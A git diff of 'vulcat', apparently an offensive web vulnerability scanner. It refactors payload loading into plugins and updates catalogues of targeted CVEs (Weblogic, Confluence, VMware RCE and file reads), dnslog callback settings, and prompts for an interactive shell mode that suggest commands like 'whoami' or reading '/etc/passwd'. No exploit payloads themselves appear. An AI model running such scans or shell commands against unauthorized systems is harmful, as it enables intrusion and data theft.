thinkphp-cnvd-2022-86535-rce | - | ThinkPHP 多语言模块命令执行 | +| thinkphp-2.x-rce | - | ThinkPHP2.x 远程代码执行 | +| thinkphp-5-ids-sqlinject | - | ThinkPHP5 ids参数SQL注入 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| ueditor-ssrf | - | Ueditor编辑器SSRF | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| uwsgiphp-cve-2018-7490-fileread | Y | uWSGI-PHP目录穿越 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| vmware-vcenter-2020-10-fileread | Y | 2020年 VMware vCenter 6.5任意文件读取 | +| vmware-vcenter-cve-2021-21972-fileupload-rce | - | VMware vSphere Client 远程代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| oracle-weblogic-cve-2014-4210-ssrf | - | Weblogic 服务端请求伪造 | +| oracle-weblogic-cve-2017-10271-unserialize | - | Weblogic XMLDecoder反序列化 | +| oracle-weblogic-cve-2019-2725-unserialize | - | Weblogic wls9_async反序列化 | +| oracle-weblogic-cve-2020-14750-bypass | - | Weblogic 权限验证绕过 | +| oracle-weblogic-cve-2020-14882-rce-unauth | Y | Weblogic 未授权命令执行 | +| oracle-weblogic-cve-2021-2109-rce | - | Weblogic LDAP 远程代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| webmin-cve-2019-15107-rce | Y | Webmin Pre-Auth 远程代码执行 | +| webmin-cve-2019-15642-rce | Y | Webmin 远程代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| yonyou-grp-u8-cnnvd-201610-923-sqlinject | - | 用友GRP-U8 Proxy SQL注入 | +| yonyou-nc-cnvd-2021-30167-rce | Y | 用友NC BeanShell远程命令执行 | +| yonyou-erp-nc-ncfindweb-fileread | - | 用友ERP-NC NCFindWeb目录遍历 | +| yonyou-u8-oa-getsession-dsinfo | - | 用友U8 OA getSessionList.jsp 敏感信息泄漏 | +| yonyou-u8-oa-test.jsp-sqlinject | - | 用友U8 OA test.jsp SQL注入 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| zabbix-cve-2016-10134-sqlinject | - | latest.php或jsrpc.php存在sql注入 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +vulcat-2.0.0/2023.03.15 +112/Poc +55/Shell ```
@@ -236,6 +242,7 @@ vulcat-1.2.0/2023.03.01 * [vulhub](https://github.com/vulhub/vulhub) * [vulfocus](https://github.com/fofapro/vulfocus) * [ttkbootstrap](https://github.com/israel-dryer/ttkbootstrap/) +* [Xray](github.com/chaitin/xray) ## Star History [![Star History Chart](https://api.star-history.com/svg?repos=CLincat/vulcat&type=Timeline)](https://star-history.com/#Ashutosh00710/github-readme-activity-graph&Timeline) \ No newline at end of file diff --git a/config.yaml b/config.yaml index 649f0e0..a2c31df 100644 --- a/config.yaml +++ b/config.yaml @@ -7,8 +7,8 @@ ceye-token: Null # dnslog.pw的域名和token # 默认带有试用域名和Token, 会过期, 可以替换为自己的 -dnslog-pw-domain: ykwc2z0d.dnslog.pw -dnslog-pw-token: cda3499b +dnslog-pw-domain: im4v3kv9.dnslog.pw +dnslog-pw-token: 1221dd92 # 请求Header # 运行时指定--user-agent参数, 会覆盖config.yaml的User-Agent @@ -18,27 +18,4 @@ headers: Accept: "*/*" Connection: "close" -# 当指定-a参数为all时, 或框架指纹识别失败时, 将会使用以下框架的POC进行扫描, 可以控制开关 -applist: [ - 'airflow', 'alidruid', 'apachedruid', 'apacheunomi', 'apisix', 'appweb', - 'cisco', 'confluence', - 'discuz', 'django', 'drupal', - 'elasticsearch', - 'f5bigip', 'fastjson', 'flink', - 'gitea', 'gitlab', 'grafana', 'gocd', - 'hadoop', 'httpd', - 'influxdb', - 'jenkins', 'jetty', 'jupyter', 'joomla', 'jboss', - 'keycloak', - 'landray', - 'minihttpd', 'mongoexpress', - 'nacos', 'nexus', 'nodejs', 'nodered', - 'phpmyadmin', 'phpunit', - 'rails', - 'showdoc', 'skywalking', 'solr', 'spring', 'supervisor', - 'thinkphp', 'tomcat', - 'ueditor', 'uwsgiphp', - 'weblogic', 'webmin', - 'yonyou', - 'zabbix' -] +payloads-path: ./payloads/ diff --git a/demo.py b/demo.py new file mode 100644 index 0000000..91fa40b --- /dev/null +++ b/demo.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + pass + + def POC(self, clients): + pass + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/lib/api/dns.py b/lib/api/dns.py index 82e8e4d..5264a50 100644 --- a/lib/api/dns.py +++ b/lib/api/dns.py @@ -13,6 +13,7 @@ from lib.api.dnslog_cn import * from lib.api.dnslog_pw import * from lib.api.ceye_io import * +from time import sleep class DNS(): def __init__(self): @@ -56,8 +57,10 @@ def domain(self, sessid): except: return 'dnslogGetError' - def result(self, md, sessid): + def result(self, md, sessid, waitTime=5): try: + sleep(waitTime) + if (('ceye' in self.dns_platform) and (self.ceye_domain)): return self.get_ceye_result(md) elif (('dnslog-pw' in self.dns_platform) and (self.dnslog_pw_domain)): diff --git a/lib/core/client.py b/lib/core/client.py index 57a8c28..842e2a9 100644 --- a/lib/core/client.py +++ b/lib/core/client.py @@ -57,8 +57,8 @@ def __init__( self.timeout = timeout self.headers = headers self.proxies = proxies - self.domain = logger.get_domain(base_url) - self.protocol_domain = logger.get_domain(base_url, protocol=True) + self.domain = logger.get_domain(base_url) # * 域名 + self.protocol_domain = logger.get_domain(base_url, protocol=True) # * 协议://域名 self.delay = config.get('delay') @@ -111,6 +111,8 @@ def request(self, method, path, **kwargs): logger.logging(vul_info, 'Error') self.print_error_info(errors.get('Error')) return None + except KeyboardInterrupt: + raise KeyboardInterrupt except: logger.logging('Error', 'Error') return None diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py index 3f6ca7c..121d033 100644 --- a/lib/core/coreScan.py +++ b/lib/core/coreScan.py @@ -8,65 +8,14 @@ from lib.tool import check from lib.tool import timed from lib.report import output +from lib.tool.thread import thread from lib.plugins.fingerprint.waf import waf from lib.plugins.fingerprint.webapp import webapp from lib.plugins.shell import shell -from payloads.AlibabaDruid.main import alidruid -from payloads.AlibabaNacos.main import nacos -from payloads.ApacheAirflow.main import airflow -from payloads.ApacheAPISIX.main import apisix -from payloads.ApacheDruid.main import apachedruid -from payloads.ApacheFlink.main import flink -from payloads.ApacheHadoop.main import hadoop -from payloads.ApacheHttpd.main import httpd -# from payloads.ApacheKafka.main import kafka # 2023/02/22 未测试准确性 -from payloads.ApacheSkyWalking.main import skywalking -from payloads.ApacheSolr.main import solr -from payloads.ApacheTomcat.main import tomcat -from payloads.ApacheUnomi.main import apacheunomi -# from payloads.ApacheStruts2 import struts2 # 2022/11/04被移除 -from payloads.AppWeb.main import appweb -from payloads.AtlassianConfluence.main import confluence -from payloads.Cisco.main import cisco -from payloads.Discuz.main import discuz -from payloads.Django.main import django -from payloads.Drupal.main import drupal -from payloads.ElasticSearch.main import elasticsearch -from payloads.F5BIGIP.main import f5bigip -from payloads.Fastjson.main import fastjson -from payloads.Gitea.main import gitea -from payloads.Gitlab.main import gitlab -from payloads.GoCD.main import gocd -from payloads.Grafana.main import grafana -from payloads.Influxdb.main import influxdb -from payloads.JBoss.main import jboss -from payloads.Jenkins.main import jenkins -from payloads.Jetty.main import jetty -from payloads.Joomla.main import joomla -from payloads.Jupyter.main import jupyter -from payloads.Keycloak.main import keycloak -# from payloads.Kindeditor.main import kindeditor # 还未测试poc准确性 -from payloads.Landray.main import landray -from payloads.MiniHttpd.main import minihttpd -from payloads.MongoExpress.main import mongoexpress -from payloads.Nexus.main import nexus -from payloads.Nodejs.main import nodejs -from payloads.NodeRED.main import nodered -from payloads.phpMyadmin.main import phpmyadmin -from payloads.phpUint.main import phpunit -from payloads.RubyOnRails.main import rails -from payloads.ShowDoc.main import showdoc -from payloads.Spring.main import spring -from payloads.Supervisor.main import supervisor -from payloads.ThinkPHP.main import thinkphp -from payloads.Ueditor.main import ueditor -from payloads.uWSGIPHP.main import uwsgiphp -from payloads.Weblogic.main import weblogic -from payloads.Webmin.main import webmin -from payloads.Yonyou.main import yonyou -from payloads.Zabbix.main import zabbix +from PluginManager import PluginManager +from PluginManager import __ALLMODEL__ from thirdparty.tqdm import tqdm from queue import Queue @@ -81,9 +30,7 @@ def __init__(self): self.thread = config.get('thread') # * 线程数 self.delay = config.get('delay') # * 延时 self.url_list = config.get('url_list') # * url列表 - self.default_apps = config.get('app_list') # * 框架列表 - self.application = config.get('application') - self.vuln = config.get('vuln') # * 是否扫描单个漏洞 + self.vulns = config.get('vulns') # * 是否扫描单个漏洞 self.batch = config.get('batch') # * 是否启用默认选项 self.no_waf = config.get('no_waf') # * 是否启用WAF指纹识别 self.no_poc = config.get('no_poc') # * 是否启用WAF指纹识别 @@ -109,7 +56,7 @@ def start(self): logger.info('red_ex', self.lang['core']['start']['url_error'].format(u)) continue - if self.shell and (not self.vuln): + if self.shell and (not self.vulns): logger.info('yellow_ex', self.lang['core']['start']['shell']) # ? 提示, 使用shell之前 请先使用-a和-v参数指定一个漏洞 break @@ -144,12 +91,10 @@ def start(self): continue # * --------------------框架指纹识别-------------------- - self.apps = [] # * 要扫描的框架列表 - self.identify_apps = [] # * 成功识别出的框架列表 + self.identify_apps = [] - if ((self.application == 'auto') and (not self.vuln)): + if ((not self.vulns)): webapp.stop = self.stop # * 添加暂停机制 - self.identify_apps = webapp.identify(self.client) # * 传递客户端client进行框架指纹识别 else: logger.info('red', self.lang['core']['start']['unable'] + u) # ? 提示, 无法访问当前url @@ -172,36 +117,20 @@ def addPOC(self): 如果指纹识别列表有内容, 则扫描识别出的框架 否则使用默认的框架列表 ''' - try: - # * 生成扫描的框架列表 - if self.identify_apps: - for app in self.identify_apps: - self.apps.append(eval(app.lower())) # todo eval将 框架字符串 转为 import导入的框架对象 - else: - for app in self.default_apps: - self.apps.append(eval(app.lower())) + # * 加载Payloads + logger.info('yellow_ex', self.lang['core']['start']['loadPayload']) - # * -v/--vuln 参数, 扫描单个漏洞 - if self.vuln: - if len(self.apps) == 1: - app = self.apps[0] # * 获取第一个框架 - poc = app.addscan(self.clients, self.vuln) # * 获取POC线程 - self.queue.put(poc) # * 加入线程 - return - else: - logger.info('red_ex', self.lang['core']['addpoc']['vuln_error_1']) # ? 日志, 使用-v/--vuln参数时出现错误 - logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色 - _exit(0) - - # * 扫描多个漏洞 - for app in self.apps: # * 根据框架列表self.apps, 获取相应poc - pocs = app.addscan(self.clients) - for poc in pocs: # * 将每个poc加入线程池 - self.queue.put(poc) - except NameError: - logger.info('red_ex', self.lang['core']['addpoc']['notfound'] + app) # ? 出错, 未找到该框架 - logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色 - _exit(0) + if (self.vulns) and ('all' not in self.vulns): + PluginManager.LoadAllPlugin(self.vulns) + else: + PluginManager.LoadAllPlugin(self.identify_apps) + + # * 为每个Payload添加线程 + try: + for SingleModel in __ALLMODEL__: + plugins = SingleModel.GetPluginObject() + for item in plugins: + self.queue.put(thread(target=item.Start, clients=self.clients)) except: logger.info('red_ex', self.lang['core']['addpoc']['Error-1']) # ? 出错, 添加poc时出现错误 logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色 @@ -214,21 +143,21 @@ def scanning(self): logger.info('yellow_ex', '', notime=True, print_end='') # * 重置文字颜色 for q in tqdm(range(queue_thread), ncols=50): # * 单个url的扫描进度条 - try: - for i in range(self.thread): # * 根据线程数, 每次运行相应次数的poc + for i in range(self.thread): # * 根据线程数, 每次运行相应次数的poc + try: if not self.queue.empty(): # * 如果线程池不为空, 开始扫描 t = self.queue.get() # * 从线程池取出一个poc t.start() # * 运行一个poc self.thread_list.append(t) # * 往线程列表添加一个已经运行的poc else: break # * 如果线程池为空, 结束扫描 - sleep(self.delay) # * 扫描时间间隔 - except KeyboardInterrupt: - if self.stop(): - continue - else: - self.queue.queue.clear() # * 清空当前url的扫描队列 - break # * 停止当前url的扫描, 并扫描下一个url + sleep(self.delay) # * 扫描时间间隔 + except KeyboardInterrupt: + if self.stop(): + continue + else: + self.queue.queue.clear() # * 清空当前url的扫描队列 + break # * 停止当前url的扫描, 并扫描下一个url def stop(self): ''' # ! 功能还没完善 @@ -268,8 +197,12 @@ def end(self): ''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存''' logger.info('cyan_ex', self.lang['core']['end']['wait']) # ? 日志, 等待所有线程运行完毕, 时间长短取决于timeout参数 for t in self.thread_list: # * 遍历线程列表 - t.join() # * 阻塞未完成的子线程, 等待主线程运行完毕 - self.results.append(t.get_result()) # * 添加扫描结果 + try: + t.join() # * 阻塞未完成的子线程, 等待主线程运行完毕 + self.results.append(t.get_result()) # * 添加扫描结果 + except KeyboardInterrupt: + continue + output.output_info(self.results, self.lang) # * output处理扫描结果, 在命令行输出结果信息 # * 保存扫描结果, .html / .json / .txt @@ -280,7 +213,7 @@ def end(self): elif (self.output_file == 'txt'): output.output_text(self.results, self.lang) - if self.shell and self.vuln: # * 是否使用Shell + if self.shell and self.vulns: # * 是否使用Shell self.start_shell() self.endTime = timed.getTime() # * 结束时间 diff --git a/lib/initial/config.py b/lib/initial/config.py index 3ca8050..65c6207 100644 --- a/lib/initial/config.py +++ b/lib/initial/config.py @@ -5,6 +5,7 @@ 参数配置 ''' +from PluginManager import PluginManager from lib.initial.language import language from lib.initial.load import load_yaml from thirdparty.requests import packages @@ -29,6 +30,9 @@ def __init__(self, args): args.lang = language() # * 语言 + payloads_path = config_yaml.get('payloads-path') # * 攻击载荷路径 + PluginManager.SetPluginPath(payloads_path) # * 设置载荷路径 + args.url_list = [] # * url列表 if args.url: args.url_list.append(args.url) @@ -107,20 +111,15 @@ def __init__(self, args): if args.vuln: args.vuln = args.vuln.lower() - args.vuln = args.vuln.replace('-', '_') - args.vuln = args.vuln.replace('.', '_') - - app_list = config_yaml.get('applist') - - if args.application in ['auto', 'all']: # * -a参数 - args.app_list = app_list - else: - args.app_list = args.application.split(',') + args.vuln = args.vuln.replace('_', '-') + # args.vuln = args.vuln.replace('.', '') + args.vulns = args.vuln.split(',') self.global_args = vars(args) # * 转为字典 - def get(self, arg): - return self.global_args[arg] + def get(self, arg, default=''): + return self.global_args.get(arg, default) + # return self.global_args[arg] def set(self, arg, value): self.global_args[arg] = value diff --git a/lib/initial/language.py b/lib/initial/language.py index 7210c6b..b457721 100644 --- a/lib/initial/language.py +++ b/lib/initial/language.py @@ -77,17 +77,18 @@ def language(): 'name': 'Vulnerability list', 'list': 'View all payload' }, - 'app_list_help': { - 'title': 'Supported target types(Case insensitive)', - 'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix' - }, + # 'app_list_help': { + # 'title': 'Supported target types(Case insensitive)', + # 'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix' + # }, 'core': { 'start': { 'start': '[INFO] Start scanning target ', 'unable': '[WARN] Unable to connect to ', 'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://', 'no_poc': '[No-POC] Disable Vulnerability scanning', - 'shell': 'When using --shell, specify a vulnerability with -a and -v first(e.g. -a httpd -v cve-2021-41773 -x)' + 'shell': '[WARN] When using --shell, specify a vulnerability with -v/--vuln first(e.g. -v cve-2021-41773 --shell)', + 'loadPayload': '[INFO] Loading payloads...', }, 'waf_finger': { 'start': '[INFO] The WAF detection for the current URL starts', @@ -205,17 +206,18 @@ def language(): 'name': '漏洞列表', 'list': '查看所有Payload' }, - 'app_list_help': { - 'title': '支持的目标类型(-a参数, 不区分大小写)', - 'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix' - }, + # 'app_list_help': { + # 'title': '支持的目标类型(-a参数, 不区分大小写)', + # 'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix' + # }, 'core': { 'start': { 'start': '[INFO] 开始扫描目标 ', 'unable': '[WARN] 无法连接到 ', 'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头', 'no_poc': '[No-POC] 不进行漏洞扫描', - 'shell': '使用--shell时请先使用-a和-v指定一个漏洞, 例如-a httpd -v cve-2021-41773 --shell' + 'shell': '[WARN] 使用--shell时请先使用-v/--vuln指定一个漏洞, 例如-v cve-2021-41773 --shell', + 'loadPayload': '[INFO] 正在加载Payloads...', }, 'waf_finger': { 'start': '[INFO] 对当前url进行WAF检测, 请稍等...', @@ -279,6 +281,10 @@ def language(): # * --list的中文 lang['zh_cn']['list'] = { + '74cms': { + 'v5.0.1-sqlinject': '74cms v5.0.1 前台AjaxPersonalController.class.php存在SQL注入', + 'v6.0.4-xss': '74cms v6.0.4 帮助中心搜索框XSS', + }, 'Alibaba Druid': '阿里巴巴Druid未授权访问', 'Alibaba Nacos': {'CVE-2021-29441': '阿里巴巴Nacos未授权访问'}, 'Apache Airflow': {'CVE-2020-17526': 'Airflow身份验证绕过'}, @@ -332,7 +338,7 @@ def language(): }, 'F5 BIG-IP': { 'CVE-2020-5902': 'BIG-IP远程代码执行', - 'CVE-2022-1388': 'BIG-IP身份认证绕过', + 'CVE-2022-1388': 'BIG-IP身份认证绕过RCE', }, 'Fastjson': { 'CNVD-2017-02833': 'Fastjson <= 1.2.24 反序列化', @@ -413,6 +419,10 @@ def language(): }, 'Ueditor': 'Ueditor编辑器SSRF', 'uWSGI-PHP': 'uWSGI-PHP目录穿越', + 'VMware': { + '2020-10-fileread': '2020年 VMware vCenter 6.5任意文件读取', + 'CVE-2021-21972': 'VMware vSphere Client 远程代码执行', + }, 'Oracle Weblogic': { 'CVE-2014-4210': 'Weblogic 服务端请求伪造', 'CVE-2017-10271': 'Weblogic XMLDecoder反序列化', @@ -441,6 +451,10 @@ def language(): # * --list的英文 lang['en_us']['list'] = { + '74cms': { + 'v5.0.1-sqlinject': 'v5.0.1 AjaxPersonalController.class.php SQLinject', + 'v6.0.4-xss': 'v6.0.4 help center search box-XSS', + }, 'Alibaba Druid': 'Alibaba Druid unAuthorized', 'Alibaba Nacos': {'CVE-2021-29441': 'Alibaba Nacos unAuthorized'}, 'Apache Airflow': {'CVE-2020-17526': 'Apache Airflow Authentication bypass'}, @@ -494,7 +508,7 @@ def language(): }, 'F5 BIG-IP': { 'CVE-2020-5902': 'BIG-IP Remote code execution', - 'CVE-2022-1388': 'BIG-IP Authentication bypass', + 'CVE-2022-1388': 'BIG-IP Authentication bypass RCE', }, 'Fastjson': { 'CNVD-2017-02833': 'Fastjson <= 1.2.24 deSerialization', @@ -575,6 +589,10 @@ def language(): }, 'Ueditor': 'Ueditor SSRF', 'uWSGI-PHP': 'uWSGI-PHP Directory traversal', + 'VMware': { + '2020-10-fileread': 'In 2020 VMware vCenter 6.5 Any file read', + 'CVE-2021-21972': 'VMware vSphere Client RCE', + }, 'Oracle Weblogic': { 'CVE-2014-4210': 'Weblogic SSRF', 'CVE-2017-10271': 'Weblogic XMLDecoder deSerialization', @@ -605,7 +623,7 @@ def language(): 'identify': '[+] 识别为"{}"漏洞, 进入Shell交互模式:', 'not_shell': '[-] 没有识别到漏洞类型, 或该漏洞类型不支持Shell', 'not_request': '[-] POC结果没有返回Request(HTTP请求数据包), 无法使用Shell', - 'input_command': '根据漏洞类型 输入相应的内容(例如"whoami"或"/etc/passwd"): ', + 'input_command': '根据漏洞类型 输入相应的Payload(例如whoami): ', 'not_command': '请输入命令 (可以输入“exit”退出)', 'faild_command': '[Faild] 使用该命令时发生错误', 'not_search_command': '[INFO] 替换新payload失败, 没有在旧的HTTP数据包中检测到旧的payload', @@ -620,7 +638,7 @@ def language(): 'identify': '[+] Identified as "{}" vulnerability, Enter the Shell interactive mode:', 'not_shell': '[-] The vulnerability type is not identified, or Shell is not supported by the vulnerability type', 'not_request': '[-] The poc result did not return the Request(HTTP Request), Unable to use Shell', - 'input_command': 'Enter the value according to the vulnerability type(e.g. "whoami"or"/etc/passwd"): ', + 'input_command': 'Enter the value according to the vulnerability type(e.g. whoami): ', 'not_command': 'Please enter the command(You can enter "exit" to exit)', 'faild_command': '[Faild] An error occurred while using the command', 'not_search_command': '[INFO] Description Failed to replace the new payload, No old payload was detected in the old HTTP packet', diff --git a/lib/initial/list.py b/lib/initial/list.py index 232f258..ef24137 100644 --- a/lib/initial/list.py +++ b/lib/initial/list.py @@ -9,9 +9,10 @@ description_t = '\t\t' # * 中英文标题的长度不一样, 中文需要添加\t才能对齐 # * ---横线长度--- -Target_len_ = '-' * 22 -Vul_id_len_ = '-' * 20 -Type_len_ = '-' * 14 +Target_len_ = '-' * 58 +# Target_len_ = '-' * 22 +# Vul_id_len_ = '-' * 20 +# Type_len_ = '-' * 14 Shell_len_ = '-' * 5 Description_len_ = '-' * 70 @@ -26,22 +27,24 @@ def list(): shell_num = 0 vul_list = '' - vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n' + vul_list += '+' + Target_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n' + # vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n' for vul in vul_info: for info in vul_info[vul]: vul_num += 1 if info['shell'] in ['Y', 'M']: shell_num += 1 - vul_list += '| {}|'.format(vul.ljust(21)) - vul_list += ' {}|'.format(info['vul_id'].ljust(19)) - vul_list += ' {}|'.format(info['type'].ljust(13)) + vul_list += '| {}|'.format(info['payload'].ljust(57)) + # vul_list += ' {}|'.format(info['vul_id'].ljust(19)) + # vul_list += ' {}|'.format(info['type'].ljust(13)) vul_list += ' {}|'.format(info['shell'].center(4)) vul_list += ' {}\t\t|'.format(info['description'].ljust(51)) vul_list += '\n' - vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n' + # vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n' + vul_list += '+' + Target_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n' - print(color.cyan(vul_list + 'vulcat-1.2.0/2023.03.01')) # * 2023-03-01 09:00:00 + print(color.cyan(vul_list + 'vulcat-2.0.0/2023.03.15')) # * 2023-03-15 09:00:00 print(color.cyan(str(vul_num - 1) + '/Poc')) # * 有一个是标题, 所以要-1 print(color.cyan(str(shell_num) + '/Shell')) # print(vul_num) @@ -50,433 +53,385 @@ def list(): vul_info = { 'Target': [ { - 'vul_id': 'Vuln id', - 'type': 'Vuln Type', + 'payload': 'Payloads', 'shell': 'Sh ', 'description': 'Description' + description_t } ], + '74cms': [ + { + 'payload': '74cms-v5.0.1-sqlinject', + 'shell': '-', + 'description': list_lang['74cms']['v5.0.1-sqlinject'] + }, + { + 'payload': '74cms-v6.0.4-xss', + 'shell': '-', + 'description': list_lang['74cms']['v6.0.4-xss'] + } + ], 'Alibaba Druid': [ { - 'vul_id': '(None)', - 'type': 'unAuth', + 'payload': 'alibaba-druid-unauth', 'shell': '-', 'description': list_lang['Alibaba Druid'] } ], 'Alibaba Nacos': [ { - 'vul_id': 'CVE-2021-29441', - 'type': 'unAuth', + 'payload': 'alibaba-nacos-cve-2021-29441-unauth', 'shell': '-', 'description': list_lang['Alibaba Nacos']['CVE-2021-29441'] } ], 'Apache Airflow': [ { - 'vul_id': 'CVE-2020-17526', - 'type': 'unAuth', + 'payload': 'apache-airflow-cve-2020-17526-unauth', 'shell': '-', 'description': list_lang['Apache Airflow']['CVE-2020-17526'] } ], 'Apache APISIX': [ { - 'vul_id': 'CVE-2020-13945', - 'type': 'unAuth', + 'payload': 'apache-apisix-cve-2020-13945-unauth', 'shell': '-', 'description': list_lang['Apache APISIX']['CVE-2020-13945'] } ], 'Apache Druid': [ { - 'vul_id': 'CVE-2021-25646', - 'type': 'RCE', + 'payload': 'apache-druid-cve-2021-25646-rce', 'shell': 'Y', 'description': list_lang['Apache Druid']['CVE-2021-25646'] }, { - 'vul_id': 'CVE-2021-36749', - 'type': 'FileRead', + 'payload': 'apache-druid-cve-2021-36749-fileread', 'shell': 'Y', 'description': list_lang['Apache Druid']['CVE-2021-36749'] }, ], 'Apache Flink': [ { - 'vul_id': 'CVE-2020-17519', - 'type': 'FileRead', + 'payload': 'apache-flink-cve-2020-17519-fileread', 'shell': 'Y', 'description': list_lang['Apache Flink']['CVE-2020-17519'] } ], 'Apache Hadoop': [ { - 'vul_id': '(None)', - 'type': 'unAuth', + 'payload': 'apache-hadoop-unauth', 'shell': '-', 'description': list_lang['Apache Hadoop'] } ], 'Apache Httpd': [ { - 'vul_id': 'CVE-2021-40438', - 'type': 'SSRF', + 'payload': 'apache-httpd-cve-2021-40438-ssrf', 'shell': '-', 'description': list_lang['Apache Httpd']['CVE-2021-40438'] }, { - 'vul_id': 'CVE-2021-41773', - 'type': 'FileRead/RCE', + 'payload': 'apache-httpd-cve-2021-41773-rce-fileread', 'shell': 'Y', 'description': list_lang['Apache Httpd']['CVE-2021-41773'] }, { - 'vul_id': 'CVE-2021-42013', - 'type': 'FileRead/RCE', + 'payload': 'apache-httpd-cve-2021-42013-rce-fileread', 'shell': 'Y', 'description': list_lang['Apache Httpd']['CVE-2021-42013'] } ], 'Apache SkyWalking': [ { - 'vul_id': 'CVE-2020-9483', - 'type': 'SQLinject', + 'payload': 'apache-skywalking-cve-2020-9483-sqlinject', 'shell': '-', 'description': list_lang['Apache SkyWalking']['CVE-2020-9483'] } ], 'Apache Solr': [ { - 'vul_id': 'CVE-2017-12629', - 'type': 'RCE', + 'payload': 'apache-solr-cve-2017-12629-rce', 'shell': '-', 'description': list_lang['Apache Solr']['CVE-2017-12629'] }, { - 'vul_id': 'CVE-2019-17558', - 'type': 'RCE', + 'payload': 'apache-solr-cve-2019-17558-rce', 'shell': 'Y', 'description': list_lang['Apache Solr']['CVE-2019-17558'] }, { - 'vul_id': 'CVE-2021-27905', - 'type': 'SSRF/FileRead', + 'payload': 'apache-solr-cve-2021-27905-ssrf-fileread', 'shell': 'Y', 'description': list_lang['Apache Solr']['CVE-2021-27905'] }, ], 'Apache Tomcat': [ { - 'vul_id': 'CVE-2017-12615', - 'type': 'FileUpload', + 'payload': 'apache-tomcat-cve-2017-12615-fileupload', 'shell': '-', 'description': list_lang['Apache Tomcat']['CVE-2017-12615'] } ], 'Apache Unomi': [ { - 'vul_id': 'CVE-2020-13942', - 'type': 'RCE', + 'payload': 'apache-unomi-cve-2020-13942-rce', 'shell': 'Y', 'description': list_lang['Apache Unomi']['CVE-2020-13942'] } ], 'AppWeb': [ { - 'vul_id': 'CVE-2018-8715', - 'type': 'unAuth', + 'payload': 'appweb-cve-2018-8715-unauth', 'shell': '-', 'description': list_lang['AppWeb']['CVE-2018-8715'] } ], 'Atlassian Confluence': [ { - 'vul_id': 'CVE-2015-8399', - 'type': 'FileRead', + 'payload': 'atlassian-confluence-cve-2015-8399-fileread-fileinclude', 'shell': 'Y', 'description': list_lang['Atlassian Confluence']['CVE-2015-8399'] }, { - 'vul_id': 'CVE-2019-3396', - 'type': 'FileRead', + 'payload': 'atlassian-confluence-cve-2019-3396-fileread', 'shell': 'Y', 'description': list_lang['Atlassian Confluence']['CVE-2019-3396'] }, { - 'vul_id': 'CVE-2021-26084', - 'type': 'RCE', + 'payload': 'atlassian-confluence-cve-2021-26084-rce', 'shell': 'Y', 'description': list_lang['Atlassian Confluence']['CVE-2021-26084'] }, { - 'vul_id': 'CVE-2022-26134', - 'type': 'RCE', + 'payload': 'atlassian-confluence-cve-2022-26134-rce', 'shell': 'Y', 'description': list_lang['Atlassian Confluence']['CVE-2022-26134'] } ], 'Cisco': [ { - 'vul_id': 'CVE-2020-3580', - 'type': 'XSS', + 'payload': 'cisco-cve-2020-3580-xss', 'shell': '-', 'description': list_lang['Cisco']['CVE-2020-3580'] } ], 'Discuz': [ { - 'vul_id': 